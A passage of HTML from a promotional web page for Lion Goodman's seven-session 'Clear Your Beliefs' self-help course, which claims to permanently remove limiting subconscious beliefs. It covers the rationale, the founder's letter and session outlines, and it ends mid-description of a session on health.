I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul>\n	<p><li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li></p>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health 